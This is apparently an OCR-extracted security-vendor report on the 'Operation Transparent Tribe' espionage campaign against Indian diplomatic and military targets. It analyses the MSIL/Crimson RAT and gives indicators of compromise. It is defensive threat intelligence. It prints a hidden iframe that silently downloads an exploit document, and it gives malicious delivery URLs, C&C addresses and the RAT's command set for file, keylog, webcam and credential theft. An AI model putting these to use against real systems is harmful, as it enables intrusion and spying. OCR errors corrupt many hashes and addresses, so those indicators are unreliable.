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Introduction 

Proofpoint researchers recently uncovered evidence of an advanced persistent threat (APT) against Indian diplomatic 
and military resources. Our investigation began with malicious emails sent to Indian embassies in Saudi Arabia and 
Kazakstan but turned up connections to watering hole sites focused on Indian military personnel and designed to drop a 
remote access Trojan (RAT) with a variety of data exfiltration functions. Our analysis shows that many of the campaigns 
and attacks appear related by common lOCs, vectors, payloads, and language, but the exact nature and attribution 
associated with this APT remain under investigation. 

At this time, the background and analysis in this paper provide useful forensics and detail our current thinking on the 
malware that we have dubbed “MSIL/Crimson”. 


Attack against Indian Embassies in Saudi Arabia and Kazakhstan 

On February 1 1 , 2016, we discovered two attacks minutes apart directed towards officials at Indian embassies in both 
Saudi Arabia and Kazakhstan. Both e-mails (Fig. 1, 2) were sent from the same originating IP address (5.1 89.1 45[.]248) 
belonging to Contabo GmbH, a hosting provider that seems to be currently favored by these threat actors. The e-mails 
also likely utilized Backspace’s MailGun service and both of them were carrying the same exact attachment. 

Emails: 

4a0728a48c393a480dc328c0e972d57c5493ee5619699e9c21ff7e800948c8e8,”def.astana” <def.astana@mea. 
gov.in> 

839569f031 a2cb6e9ae1 dc797b1 bd7cce53d3528c8b5fbec21 cecb0de3f5ac88,”def.riyadh” <def.riyadh@mea. 
gov.in> 

Attachment: 

3966f669a6af4278869b9cce0f2d9279, Harrasment (sic) Case Shakantula.doc 
exploit: CVE-2012-0158 

Doc dropped: 

6a69cd7a2cb993994fccec7b7e99c5daa5ec8083ba887142cb0242031 d7d4966.svchost.exe 
functionality: downloader 
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Figure 1: First email sent to Embassy of India, Astana, Kazakhstan 
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Figure 2: Second email sent to Embassy of India, Riyadh, Kingdom of Saudi Arabia 






In this incident, the attachment was a weaponized RTF document utilizing CVE-2012-0158 to drop an embedded, 
encoded portable executable (PE). To decode the embedded PE, the document’s shellcode first searches for the 
OxBABABABA marker that, when found, will indicate the beginning position of the PE (Fig. 3). The PE is then decoded 
using the key OxCAFEBABE while skipping null DWORDs (Fig. 4). A final marker indicates the end of the PE file, which, 
this case, is the marker OxBBBBBBBB. This decode routine, including other components of the exploit document, have 
been discussed before and have been observed in completely unrelated incidents. 



Figure 3: Shellcode searching for OxBABABABA marker 
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Figure 4: Decoding of encoded PE and searching for terminator marker 

After successful exploitation and decoding of the embedded payload, a family of malware we refer to as MSIL/ 

Crimson will be executed on the victim’s machine. The first stage in infection is a downloader whose purpose is 
to download the more fully featured RAT component. The MSIL/Crimson downloader that was dropped (md5: 
3a67ebcab5dc3563dc1 61 fdc3c7fb1 61 ) will attempt to download the full RAT from 21 3.136.87[.]1 22:1 0001 (Fig. 5). Afull 
description and analysis of the MSIL/Crimson malware family is provided in the Technical Analysis section. 
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Figure 5: MSIL/Crimson downloading RAT 


Fake blog with an Indian military emphasis leads to MSIL/Crimson and more 

While conducting research related to MSIL/Crimson, Proofpoint researchers discovered a malicious blogspot.com site 
(Fig. 6), intribune. blogspot[.]com, that appears to have been set up to lure Indian military officials into becoming infected 
with MSIL/Crimson, njRAT, and possibly other malicious tools. This site is likely operated by the same actor(s) that carried 
out the previously discussed attacks on Indian embassy officials based on shared C&C infrastructure as discussed in the 
Cluster Analysis section. Most of the published stories contain some method of directing potential victims to a malicious 
payload, although a few of the stories did not contain any malicious code at time of analysis. In the following articles from 
this site, we see the threat actors conducting their malicious activities in multiple ways: 

1 . Using hyperlinks via an image or text 

2. Using the same hypertext link in the article text, on the story’s image, and in an iframe 

3. The final article in this section contains a link to an additional website that is likely operated by the same threat 
actor(s) and connected to other email campaigns 

Lure articles 

4 Sikh Army Officers being trialed in military court on alleged involvement with KLF 

Link: hxxp://intribune.blogspot[.] com/201 5/1 1/4-sikh-army-officers-being-trialed-in.html 

Malicious Document Location: hxxp://bbmsync2727[.]com/news/4%20Sikh%20Amny%200fficers%20being%20trialed. 
doc 

Document: 01 97ff1 1 9e1 724a1 ff bf33df 1 441 1 001 
Type: Exploit, CVE-201 2-01 58, Embedded Payload 
Dropped: njRAT - 27ca1 3685021 4234bcdca765dfaed79f 
C&C: 5. 1 89.1 45[.]248: 10032 
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India News Tribe 


4 Sikh Army Officers being trialed in military court on alleged 
involvement with KLF 



New Delhi Desk-4 Sikh Army Officers being trialed in military court on alleged involvement with KLF. 
Read More. 

Figure 6: Article lure leading to exploit document capable of installing njRAT on vulnerable machines 


[n one such operation. Operation Blue Star (June 1984), the Indian Army led by the .... Kapur 

I I I H J J W\Vv»WvVv 

Singh, a senior Sikh Indian Civil Service officer, was dismissed by the .... Dal was initially 
opposed to Bhindranwale, and even accused him of being a 


Figure 7\ Decoy document dropped by “4 Sikh Army Officers being trialed.doc” 

One notable difference between this article and the rest is that it contained an iframe pointing to the same document 
linked to via the “Read More” hyperlink. This iframe causes visitors to be prompted to download the document 
immediately upon visiting, as well as from the top level of the malicious website. 

<iframe height= ir i" src= ,p http : //bbmsync2727 , com/news/4%20Sikh%20Ariny%20Officers%20being%2Gtrialecl . doc" style="display : none; " width= ir i ir ></iframe> 

Figure 8: Iframe linking to malicious document 



Seventh pay commission recommends overall hike of 23.55% 

Link: hxxp://intribune.blogspot[.] com/201 5/1 1/seventh-pay-commission-recommends.html 

At time of analysis, this web page contained no malicious links; however, we discovered a document that was likely 
either prepared for this page or was previously linked to by this page. 

Malicious Document Location: hxxp://bbmsync2727[.]com/cu/seventh%20pay%20commission%20salary%20calculator. 
xls 

Document: 0e93b581 93fe8ff8b84d543b535f31 3c 

Additional Document Location: hxxp://bbmsync2727[.]com/cu/awho_handot_201 5.xls 

VBS Location: hxxp://bbmsync2727[.]com/cu/su.exe 

Payload (older): 07e44ffcffde46ad96eb9c018bed6193 (DarkComet) 

C&C (older): 5.189.145[.]248:1453 

Payload (newer): 708a1af68d532df35c34f7088b8e798f (Luminosity Link RAT) 

C&C (newer): 5.189.145.248:6318 

India News Tribe 


Seventh pay commission recommends overall hike of 23.55% 

In the new year, central government employees can look forward to fatter pay cheques 
and heftier allowances. 



The seventh pay commission on Thursday recommended an average 23.55% 
increase in their salary, allowances and pension, a move that will benefit 4.8 million 
staffers and 5.5 million pensioners. The hike will be effective from January 1, 2016. 

Read| Seventh Pay Commission Salary Calculator 

A minimum pay of Rs 18,000 per month and a maximum of Rs 2.5 lakh has been 
recommended by the commission, headed by justice (retired) AK Mathur, that 
presented its 900-page report to finance minister Arun Jaitley. 

Figure 9: Article lure with no link but likely lead to DarkComet or other malware 


Army Air Defence (sic), Engineers and Signal to get additional colonels posts 

Link: hxxp://intribune.blogspot[.] com/201 5/1 1/army-air-defenceengineers-and-signal-to.html 
Malicious Document Location: hxxp://birthdaywisheszone[.]com/pml/army-air-defenceengineers-and-signal.doc 
Document: 68773f362d5ab4897d4ca21 7a9f53975 
Type: Exploit, CVE-201 2-01 58, Embedded Payload 

Dropped: dac4f8ba3190cfa1f813e79864a73fe1 (MSIL/Crimson Downloader) 

C&C: 213.136.87[.]122:10001 

Downloaded MSIL/Crimson RAT: f078b5aeaf73831361ecd96a069c9f50 

India News Tribe 


Army Air Defence,Engineers and Signal to get additional colonels 
posts 



Implementation of 141 additional posts of colonels that it has now decided to add to the air defence 
artillery, engineers and signals corps after agreeing to reduce their command postings tenure from 
existing four years to three years. Government would first create the additional positions of colonels for 
better promotional avenues. 

Read Full Court Order. 


Figure 10: Article lure ultimately leading to MSIL/Crimson RAT 


9 


|The Supreme ourl on Thursday asked the government to spell out its timeline for the 
implementation of 141 additional posts of colonels that it has now decided to add to the air 
defence artillery engineers and signals corps after agreeing to reduce their command 
postings tenure from existing four years to three years 


air defence artillery, engineers and signals - so that they may have a commanding officer at 
the age of 37 years and exiting after 2-1/2 year tenure with no repeat appointment 


Under this policy, 1,484 posits of colonel were created 750 in 2004 which according to 
government were erroneously distributed by the army headquarter across the army on pro- 
rate basis 


A bench of Justice T S.Thakur and Justice Kunan Joseph asked the government to tell it 
about the penod during which the strength of the colonel rank officers would be augmented 
by 141 additional positions after court was informed that government has accepted the 
suggestion by it (court) to reduce the command tenure there 


However, in 2009, 734 posts of colonel under the "command and exit" policy were 
earmarked exclusively for the armed wing of the army. 


Telling the court that government would first create the additional positions of colonels for 


The hearing will continue on November 19 


better promotional avenues. Additional Solicitor General RdanUifiteC. Singh told the court that 
the army may still retain a commanding officer beyond his tenure to meet operational 
requirements 

However, he made it clear that it would not be at the expense of 141 new posts that will now 
be added in these three wings 

The court took exception to Singh saying that the proposed creation of 141 posts for three 
corps was to correct the " bona f ide mistake” but would come into force prospectively and not 
from back date as it was likely to create problems 

Telling him that people who have suffered from the "bonafide mistake" have to be restored 
to the position where mistake does not lie the court said that the "mistake has to be 
corrected from January 2009 from where it had started'' 

It said that either government has to do this voluntarily or it would order so. and as all the 
affected officers are in service, it would not pose any problem in introducing additional posts 
and considenng them for next promotion 

The court is hearing the Centre's appeal against Armed Forces Tnbunafs March 2 order, by 
which it had quashed January 21, 2009 "command and exit" policy which weighed in the 
Isyeur Of infantry, mechanised, infantry and the armoured, corps, saying that it was yjoMiYO 
ofthe constitution's article 14 (equality before law) 


Figure 11: Decoy document dropped by “army-air-defenceengineers-and-signal.doc” 

SC Seeks Army response on batch parity in officers promotion 

Link: hxxp://intribune[.]blogspot[.]com/2015/09/sc-seeks-army-response-on-batch-parity.html 
Malicious Document Location: hxxp://www[.]avadhnama[.]com/latest/batchparity-command-exit-policy.doc 

Unfortunately we have not been able to retrieve the document hosted at that location; however, another file was located 
in the same directory: 

Location: hxxp://avadhnama[.]com/latest/ssbs.exe 

Hash: df6b3946d1064f37d1b99f7bfae51203 (MSIL/Crimson Downloaded 

C&C: 213.136.87.122:10001 

Downloaded MSIL/Crimson RAT: C2bc8bc9ff7a34f14403222e58963507 


The bone of contention is government policy of 2009 which earmarked more posts of 
colonel for the armed wing of army - infantry, mech.aDBed infantry, arnmted corps, artillery 



India News Tribe 


SC Seeks Army response on batch parity in officers promotion 

The Supreme Court on Thursday asked the Indian Army to spell out what was its 
approach and policy on batch parity in the promotion of commissioned officers in 
different wings - combat, support and services. 

Read More. 



Figure 12: Article lure possibly leading to MSIL/ Crimson RAT 


Seniors Juniors and coursemates please take a serious note about it 

Location: hxxp://intribune[.]blogspot[.]com/2015/05/seniors-juniors-and-coursemates-please.html 
Potential Payload Location: hxxp://sms[.]totalworthy[.]com/intribune.zip 

Unfortunately we have been unsuccessful in retrieving intribune.zip and are unsure what, if any, payloads it may have 
contained. 


India News Tribe 


Seniors Juniors and coursemates please take a serious note about 
it 

WARNING: 

Seniors Juniors and coursemates please take a serious note about it 
A lady name Geneiveve mary from ambala daughter of some JCO posted in bikaner 
Had been approaching me, with all kind of her personal problem with some of the 
officers 

and after a while i came to know about her, that she has been making large no. of 
friends from defence forces and she goes to meet each and every guy she befriends 
on facebook, tinder, or whats app and have been taking advantages from them. 



Figure 13: Article lure leading to likely malicious payload in the past 


AWHO- Defence (sic) and Para-Military Forces Personnel Plots Scheme 2016 

Link: hxxp://intribune[.]blogspot[.]com/2015/07/awho-defence-and-para-military-forces.html 
Malicious Document Location: hxxp://bbmsync2727[.]com/upd/AWHO-Upcoming-Projects.doc 
Document: 1 f82e509371 cl C29b40b865ba77d091 a 
Type: Exploit, CVE-201 2-01 58, Embedded Payload 

Dropped: 643d6407cd9a4f1 C6d2742f24aed34f5 (MSIL/Crimson Downloader) 

C&C: 213.136.87.122:10001 

Downloaded MSIL/Crimson RAT: 0e3e81f4d2054746f74442075f82a5c5 




India News Tribe 


AWHO- Defence and Para-Military Forces Personnel Plots 
Scheme 2016 



g Schemes 
Army Personnel 


Press Release: Army Welfare Housing Organization [Kashmir House, Raja Marg, New Delhi.) 
launches new mega housing scheme with unique dwelling units for serving officers of Army/Navy/ Air 
Force and Para Military Forces. Send 100 ? by postal orders or DD to obtain Master Brochure by 
registered post. 


I VI 'ES I'UHhiS Of UVi U L EJ N UK IIS IK LAUB AT VAUZUll K STATJCWTif mi! !i I W Al'J'LZLANl S 

I rJ ■ III mf -i rjj vr. _ rarrwi WKW ^ ril i.1 -.ijr .lu u unua iu 



Last Date to apply is 31st December 2015. The detail of new and existing projects are attached in 
password protected sheet. 

GET CALL DETAIL RECORDS ONLINE 
Figure 14: Article lure ultimately leading to MSIL/Crimson and another malicious website 




The AWHO article contains a link to hxxp://cdrfox[.]xyz/ via the “GET CALL DETAIL RECORDS ONLINE” hyperlink. 
This website is likely operated by the same actor(s) and is capable of delivering a VBS-based malicious document to 
unsuspecting victims (Fig. 15). Again, there is an obvious India-targeted theme that suggests this malicious website 
is specifically targeted at that nation. After using the number submission form, victims are directed to another page 
containing the final link to download a malicious document (Fig. 16). 




Enter your mobile number here 


DOWNLOAD CALL DETAIL RECORDS 




^ airtel 







BSNL 


Figure 15: Landing page for cdrfox[.]xyz 
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AWESOME!!! 


Successfully grabed aLL call records of Last 90 Days of Phone Number 

Download File 


Figure 16: Download File lure containing document that ultimate leads to Crimson Down loader 

Document Details 

Location: hxxp://fileshare[.]attachment[.]biz/?att= 1455255900 
Document: 1871 1f1db99f6a6f73f8ab64f563accc 
Document Name: “Call Details Record.xls” 

Type: VBS Macro 

VBS Location: hxxp://afgcloud7[.]com/logs/ssc.mcom 

Payload: 3cc848432e0ebe25e4f19effdd92d9c2 (MSIL/Crimson Downloader) 

Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3 

Additional payloads were found on the same server but in a different directory: 

hxxp://afgcloud7[.]com/com/psp.dlc-bk (hash: 62d254790834f30a79ee79305d9be837, also previously named psp.dlc) 
hxxp://afgcloud7[.]com/com/psp.dlc (hash: dd0fc222852f5d12fda2fb66e61b22f6)hxxp://afgcloud7[.]com/upld/updt.dll 
(hash: 0ad8491 21 b4656a239e85379948e5f5d) 

Both files in the “/com/” directory are malicious droppers that ultimately drop a decoy Excel spreadsheet and a 
MSIL/Crimson downloader. The spreadsheet is themed towards the Armed Forces Officials Welfare Organization 
(AFOWO) located in India, while the dropped downloader and downloaded RAT communicate with the same C&C 
as many of the previously discussed samples. An Excel spreadsheet named “AFOWO Broucher 2016.xls” (hash: 
98bdcd97cd536ff6bcb2d39d9a097319) was also found containing a malicious macro that attempts to download a 
payload from hxxp://afgcloud7[.]com/com/psp.dlc . Additionally, the IP address (50.56.21 [.] 1 78) resolved from email. 
books2day.com (used in the embassy attacks). This IP has also recently resolved to email. afowoblog[.]in. We would not 
be surprised if an email address using @afowoblog.in was used to send the malicious “AFOWO Broucher 2016.xls” 
spreadsheet. Additional research related to this domain is provided in the Cluster Analysis section. 

62d254790834f30a79ee79305d9be837 / dd0fc222852f5d12fda2fb66e61 b22f6: 

Dropped Decoy Dropper: 29054da7a1f1fbd0cb3090ee42335e54 
Decoy Document: 66cd38a03282b85fceec42394190f420 

Payloads: 83a8ce707e625e977d54408ca747fa29 or 2c9cc5a8569ab7d06bb8f8d7cf7dc03a (both MSIL/Crimson 
Downloader) 

C&C: 213.136.87.122:10001 

Downloaded MSIL/Crimson RAT: 463565ec38e4d790a89eb592435820e3 

0ad8491 21 b4656a239e85379948e5f5d 

The payload found in the “/upld/” directory (md5: 0ad8491 21 b4656a239e85379948e5f5d) is the MSIL/Crimson SecApp 
module capable of downloading the full MSIL/Crimson RAT and all subsequent modules. Additionally, this payload drops 
a decoy document (Fig. 17) with the filename: “Cv of IMA Chief.docx” (hash: 8e5610d88c7fe08ac13b1c9f8c2c44cc). The 
decoy document contains information regarding a possible Brigadier General whose last and current position (according 
to the decoy) is the Chief of International Military Affairs Department Ministry Defence (sic) of Afghanistan. 
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Cuntdds 

Mobile: 

+93(0) 

+93(0] 

Qfffce Ph: 

+93<030li 

+93(020) 

E mail: 

jSmod.BQtf.af 


Name: Brigadier General ■ 


Father Name: 

Place of Birth: ^ Afghanistan. 
Date of Birth: 

GlpOd Grpgp: 

P a sfiport No m ber:BHM 


Address: 


Afghanistan 


Figure 17: Decoy document dropped by 0ad8491 21 b4656a239e85379948e5f5d 


Cluster Analysis 

In this section we will present our research surrounding the use of the MSIL/Crimson implant and campaigns that are 
part of Operation Transparent Tribe. Even though the tool may possibly be used by several threat actors, our research 
indicates that the hundreds of Crimson samples may be clustered into a much smaller set of activity as described below. 

Cluster 1 - Operation Transparent Tribe and More 

The first cluster is the largest with activity from over one hundred samples dating as far back as 2012 (Fig. 18). For this 
cluster, we started our analysis beginning with the email attacks on the Indian embassies and the fake Indian news blog. 
The activity surrounding those two events uncovered numerous other samples hosted on attacker-controlled C&C that 
then lead to at least one additional email attack campaign. On one of the C&Cs we discovered a Python-based RAT 
(Python/Peppy) whose activity very closely clusters to Operation Transparent Tribe. We have also observed this RAT 
being downloaded and executed along with MSIL/Crimson by Andromeda downloaders. In addition to Crimson and 
Peppy, we have observed the usage of Luminosity Link RAT, njRAT, Bezigate, Meterpreter, and several custom 
downloaders. 
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■ Email Address □ UniqueldentifierO IPv4 Address 
□ Domain □ file 

Figure 18: Maltego graph of cluster 1 activity (click here for the complete graph) 

The attackers responsible for this activity appear have to used a mixture of compromised infrastructure (e.g., sahirlodhi[.] 
com) and infrastructure owned solely by them (e.g., bbmsync2727[.]com). In many cases, the attackers used common 
patterns in naming their domains: 

• sync in domain name and file name 

• Repeated use of bb in domain name or filename, mostly bbm 

• Ending second level domain names in four digits 

Additionally, this cluster of activity has numerous instances where Contabo GmbH was used for C&C. However we never 
used that as a sole item to group activity together under this cluster. Next, we will discuss an additional email attack, the 
attachment.biz activity, and lastly the afowoblog.in domain, all of which we believe fall into this cluster. 


Email campaign using “2016 Pathankot attack” Lure 

While researching this activity, we discovered an additional email attack campaign using the 2016 Pathankot attack as a 
lure (Fig. 19). This attack utilized a URL (hxxp://comdtoscc.attachment[.]biz/?att= 1451 926252) to deliver a compressed 
file (md5: f689471d59e779657bc44da308246ac4) containing two MSIL/Crimson payloads using 1 93.37.1 52[.]28:9990 as 
their C&C. 

< arvind dut @ gmail. c om > wrote: 

The terrorist attack 01 Patkankot Air Force base: Detail behind the scenes, terrorists call record, satellite tracking record is attached. 


Regards, 

Maj Gen Arvind Dutta 


<•) Cal Record and 
Tracking Route jnp3 


□ □ r 

download http V/comdtoscc.attachment. biz/?att=1 45 1 926252 


Figure 19: email campaign using “2016 Pathankot attack” as a lure 

The attackers further increased the believability of their attack by including decoy files with each of the MSIL/Crimson 
payloads: 

Sample 1: 65f6143d69cb1246a1 17a704e9f07fdc 
Original name: “Call Record and Tracking Route.scr” 

Dropped decoy: 2f821d8c404952495caae99974601e96, Audio file with image (Fig. 20) 

Decoy name: “Call Record and Tracking Route. mp3” 
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Media 


Audio Video Subtitle Tools View 


Call Record and Tracking Route.mp3 - VLC media player 
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Figure 20: Audio file decoy, likely discussing Pathankot attack 

Sample 2: 723d85f905588f092edf8691 cl 095fdb 
Original name: “detail behind the scenes.scr” 

Dropped decoy: a523b090e9a7e3868d8d1fde3e1ec57d,PDF (Fig. 21) 
Decoy name: “detail behind the scenes.pdf” 
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Figure 21: Pathankot attack decoy 



ATTACHMENT.BIZ domain 


We discovered additional activity surrounding the attachment.biz domain that is being used to deliver malicious 
documents and payloads. The observed domains include: 

• fileshare.attachment[.]biz 

• comdtoscc.attachment[.]biz 

• ceengrmes.attachment[.]biz 

• email. attachment^] biz (no links discovered) 

All of the domains resolve to the same IR 91 .194.91 [,]203 (Contabo GmbH). So far we have detected three separate 
campaigns, although we’re unsure of the starting point for each of these incidents but are highly confident they exist 
this cluster of activity. 

Link 1: hxxp://ceengrmes.attachment[.]biz/?att=1450603943 
Payload: 07defabf004c891ae836de91260e6c82, MSIL/Crimson 
Payload name: Accn Letter.scr 
C&C: 5.189.143[.]225:1 1 114 

Link 2: hxxp://fileshare.attachment[.]biz/?att= 1455264091 
Payload: 1871 1f1db99f6a6f73f8ab64f563accc,XLS VBS-downloader * 

Payload name: Air India Valid Destinations.xls 

*Same payload as delivered by hxxp://fileshare[.]attachment[.]biz/?att= 1455255900 from the attacker’s cdrfox.xyz site 

Link 3: hxxp://comdtoscc.attachment[.]biz/?att= 14537881 70 
Payload: 45d3130a901b7a763bf8f24a908b1 810, compressed archive 
Payload name: Message.zip 

Decompressed Payload: 765f0556ed4db467291d48e7d3c24b3b, MSIL/Crimson 
Decompressed payload name: Message.scr 
C&C: 1 93.37.1 52[.]28:9990 


AFOWOBLOG.IN Domain 

We have uncovered circumstantial evidence indicating that the afowoblog.in domain falls into this cluster of activity. 
The domain was registered on or near February 24th, 2016 using the email address thefriendsmedia@gmail.com, 
which is also close to the same day that the “AFOWO Broucher 2016.xls” attachment was uploaded to VT. We have 
detected potentially connected activity as far back as June 2013 using the domain thefriendsmedia[.]com , where it 
was used as an Andromeda C&C. 

In one instance (Fig. 22, maltego graph), we observed an Andromeda payload communicate with 
brooksidebiblefellowship[.]org to retrieve an additional Andromeda payload from lolxone[.]com that then used 
thefriendsmedia[.]com as its C&C. The original Andromeda also retrieved a Bezigate payload. 
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5075blc4345c6fd325d0f3f7605f40c7 



236e7451cbce959ca0f62fb3b499b54e 


>r 


v 




thefriendsmedia.com 


62.4.23.46:1500 


Figure 22: thefriendsmedia connection to Andromeda, lolxone[.]com, and Bezigate 

Furthermore, we have observed lolxone[.]com hosting additional Bezigate payloads as well as the Python/Peppy 
malware as shown in the graph below (Fig. 23). This activity can be further connected to the overall cluster via the Peppy, 
Bezigate, and Andromeda C&Cs as shown in the complete Maltego graph (Fig. 25). 
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Figure 23: lolxone[.]com and Andromeda connections to Python/Peppy, Bezigate 

Cluster 2 - guddyapps/appstertech/sajid 

Some Crimson SecApp modules we came across did not download the expected RAT or downloader payload when it 
first communicated to its C&C. For example, sample: 85429d5f2745d813e53b28d3d953d1cd retrieved a downloader 
from 178.238.228[.]1 13:7861 . Once the downloader was executed, it then downloaded an XMPP library (md5: 
fee34da6f30a1 7e1 fcc5a49fd09871 69) and the XMPP-based Trojan (md5: d3094c89cad5f8d1ea5f0a7f23f0a2b1) we 
refer to as Beendoor. Beendoor is a very interesting piece of malware and we were able to gather additional 
information about this variant's C&C, 178.238.235[.]143. 

Much like Crimson and Peppy, Beendoor is capable of taking screenshots of the victims desktop. On Beendoor’s C&C 
we were able to recover a screenshot that appears to have been taken from one of the malware developer’s computer 
(Fig. 24). In this modified screenshot we are bringing attention to a few key pieces of information: 

• Identical “Anushka” image on desktop found on Beendoor C&C and used in Beendoor sample 

• Folder structure similar to that found on the C&C 

• Hardcoded paths found in Beendoor dropper binary (md5: 9b98abb9a9fa714e05d43b08b76c0afa) 

• Same file names used by Beendoor and the XMPP library 
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Hi-res "anushka.jpg" found on C&C 


appstertech.com 

guddyapps.com 


Beendoor Downloader: 

950eb31 4435bdb3c46c9f0954c935287 

wmplayer.exe fS 
d3094c89cad5f8d 1 ea5f0a7f23f0a2b1 


agsxmpp.dll 
fee34da6f30a1 7e1 fcc5a49fd09871 69 


Figure 24: Screenshot of likely Beendoor developer’s desktop 

As shown in the figure, it seems likely that the Pakistan-based company Appstertech is somehow connected to the 
Beendoor malware. Based on the analysis of the folders and files on the Beendoor C&C, we can also conclude that this 
activity is related to research published by CloudSek late last year. 

In the Crimson samples that we found connected to Beendoor (Fig. 25), several of them used the same “Binder” dropper 
that we observed in other clusters, including Cluster 1 . Moreover, the C&C for this occurrence of Crimson and Beendoor 
are both hosted at Contabo GmbH, another similarity with other clusters surrounding the Crimson implant. 


V _ “to 



Figure 25: Maltego graph of Crimson <-> Beendoor cluster 


Cluster 3 - “Nadra attack in Mardan” Lure 

In addition to the attack using the recent Pathankot attack as a lure, we discovered several samples that may have 
been used in recent attack campaigns utilizing the December attack in Mardan near a National Database and 
Registration Authority (Nadra) as a lure. Several samples were uploaded to VT in compressed archives containing 
Crimson payloads along with possible decoys their respective droppers would have dropped. For example, 
one of the payloads (md5: 51c57b0366d0b71acf05b4df0afef52f, “NADRA OFC.exe”) was uploaded to VT along 
with an image (md5: be0b258e6a41 9b926fe1 cfc04f7e575a) that can also be found here: hxxp://i.dawn[.]com/ 
medium/201 5/1 2/56825d6d8f1a5. png which is linked to by an article about the attack: hxxp://www.dawn[.]com/ 
news/1 229406 

For this cluster of activity, we’re not currently aware of any droppers and so have decided to cluster it on its own. With 
that in mind however, the TTPs for this campaign are nearly identical to the “Pathankot attack lure” campaign in Cluster 
1. Unsurprisingly, the C&C utilized in this campaign is hosted at Contabo GmbH. Lastly, the port used in these samples, 
11100, is the same port used by some of the samples we have grouped in Cluster 1 . 


Threat Insight | Operation Transparent Tribe 
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Cluster 4 - DDNS and Pakistan 

The final cluster we would like to discuss include several samples all using DDNS for their C&C pointing to Pakistan IP 
(according to Whois) addresses. The majority of this activity is from 2013. Based on the slightly different TTPs (purely 
DDNS usage) and no use of Contabo GmbH, we have clustered this separately from other activity, even though we 
have observed DDNS usage in Cluster 1 and the obvious overlap in tool usage. This activity is graphed in Figure 26 
and included in the lOCs section. 



^ 

119.154.209.175 119.154.134.211 119.154.220.96 


182.181.239.4 



119.157.229.245 


119.157.163.145 


Figure 26: DDNS and Pakistan IP address Maltego graph 


One Cluster to Rule Them All, Nothing Yet to Bind Them... 

There are numerous overlaps between the clusters, including usage of the “Binder” dropper, attack lures, and most 
obvious, the usage of Contabo GmbH. Unfortunately we lack information regarding some of the found samples as far as 
how they were used and in what campaigns, and so we have decided not to tie all the activity together. As we continue to 
research these incidents, we would not be surprised to find additional information linking all clusters together. 


Technical Analysis 

MSIL/Crimson 

Crimson is modular in the sense that additional payloads downloaded by the main RAT module are often utilized to 
perform functions such as keylogging and browser credential theft. Crimson infections also typically occur in stages. 
Crimson’s first stage is a downloader component whose primary purpose is to download a more fully featured RAT, 
typically being the Crimson RAT component. The RAT component will then send system information to the C&C while the 
C&C will likely respond with additional module payloads. 

Crimson utilizes a custom TCP protocol for communicating to C&C (Fig. 27). Some of Crimson’s optionally downloaded 
modules have no C&C capability and instead rely on the RAT component for information exfiltration. 


00007651 09 00 00 00 00 64 69 72 73 3d 6c 69 73 74 dir s=list 

000000M 13 00 00 00 00 42 4f 52 41 4b 48 37 38 36 2d 64 BOR AKH786-d 

000000BA 69 72 73 3d 43 3a 5c 3e irs=C:V> 


Figure 27: Crimson custom TCP C&C protocol 
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Crimson-infected victims may be spied on by their attackers via invasive methods such as through their webcam, 
stealing email from Outlook, and recording their screen. Some Crimson RAT variants support at least 40 individual 
commands, while all the individual commands throughout the different versions of the RAT we researched are listed and 
described in Table 1. 

Table 1. MSIL/Crimson supported commands 


Command 

Description 

afile 

Exfiltrate file to C&C 

audio 

Download leaitimate NAudio library from C&C. save as NAudio.dll (not 
executed or added to startup). Used to record audio from microphone. 

autf 

Add extensions to file extensions list. Optionally search for files in extensions 
list and exfiltrate 

autoa 

Exfiltrate all files with an extension matching the file extensions list 

capcam 

Capture still from webcam 

camvdo 

Continuous capture from webcam (stopped with stops command) 

clping 

set runTime to DateTime.Now 

clrklg 

Stop keylogger and delete keylogs 

cnls 

Stop upload, download, and screen capture 

cscreen 

Single screenshot 

delt 

Delete provided path/file 

dirs 

Send disk drives 

dotnet 

Download URLDownload payload, save as dotnetframwork.exe and add to 
startup via registry 

dowf 

Retrieve file from C&C 

dowr 

Retrieve file from C&C and execute 

email 

Capable of retrieving email account name, number of emails, and exfiltrate 
emails from Outlook 

endpo 

Kill process given PID 

fbind 

Save file from C&C in existing directory with .exe appended to name 

file 

Exfiltrate file to C&C 

filsz 

Send file info: CreateTimeUtc, File Size 

fldr 

List folders in a directory 

fles 

List files in a directory 

ftyp 

Add extensions to file extensions list 

info 

Send PC info (MAC, PC Name, User, LAN IR OS, AV, missing modules...) 

klgs 

Sometimes not implemented but command exists (previous versions: enable 
automatic exfiltration of keylogs) 

listf 

Search for files with given extension(s) 

mesg 

Pop-up “Alert” box with provided message 

msdlf 

Click mouse 

muspo 

Move mouse cursor 
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obind 

Save file from C&C to directory with .exe appended to name 

outdwn 

Search for specific email attachment with specified name and exfiltrate 

passl 

Retrieve password logger logs 

prod 

List processes 

runf 

Execute command 

rupth 

Retrieve malware’s run path 

savaf 

Save file from C&C 

scren 

Capture screen continuously 

scrsz 

set scrSize (utilized by scren and cscreen) 

secup 

Download “secApp” payload from C&C, add to startup via registry 

sndpl 

Download “pssApp” from C&C (browser credential stealer) and begin log 
exfiltration 

sndps 

Download “pssApp” from C&C (browser credential stealer) 

splitr 

Split file to provided number of splits, however we believe due to 
programmer error this functionality will not work as expected 

stops 

Stop screen capture 

stsre 

Get microphone audio 

sysky 

Exfiltrate keylogs to C&C 

systsk 

Update module, likely secApp 

thumb 

Get 200x150 GIF thumbnail of image 

uclntn 

Sets RegKey: [variable]_ver to provided value, possibly used as a version 
indicator 

udlt 

Download “remvUser” payload from C&C, save as msupdate.exe, then 
execute it 

uklog 

Download keylogger payload from C&C, save as win_services.exe then add 
to start up via registry 

update 

Download controller/client/main RAT, save as servicesdefender.exe, then 
execute it 

updatu “OR” usbwrm 

Download USB payload, save as udriver.exe then add to start up via registry 


MSIL/Crimson Module Analysis 

As previously mentioned (and shown in the commands table), Crimson relies on additional module payloads to further 
enrich its feature set. These modules include keylogging, browser credential theft, automatic searching and stealing of 
files on removable drives, and two different payload update modules. Lastly, there appears to be a module referred to as 
“remvllser” that we have not been able to locate. 

URLDownload 

When executed, this module will first check for the existence of a registry key: HKCU\SOFTWARE\Microsoft\Windows\ 
CurrentVersion\last_edate . If the key does not exist then it will be created by the module and assigned a DateTime.Now 
string. This key is periodically checked for how many days have passed. Once the malware detects that at least 15 days 
have passed, a HTTP GET request is sent to a hardcoded location to retrieve a text file that should point to another HTTP 
location containing a final payload. For example, one analyzed sample (md5: 53201 3750ee3caac93a99721 03761 233) 
contained a hardcoded URL: hxxp://sahirlodhi[.]com/usr/api.txt. So far we have observed the attackers modify api.txt 
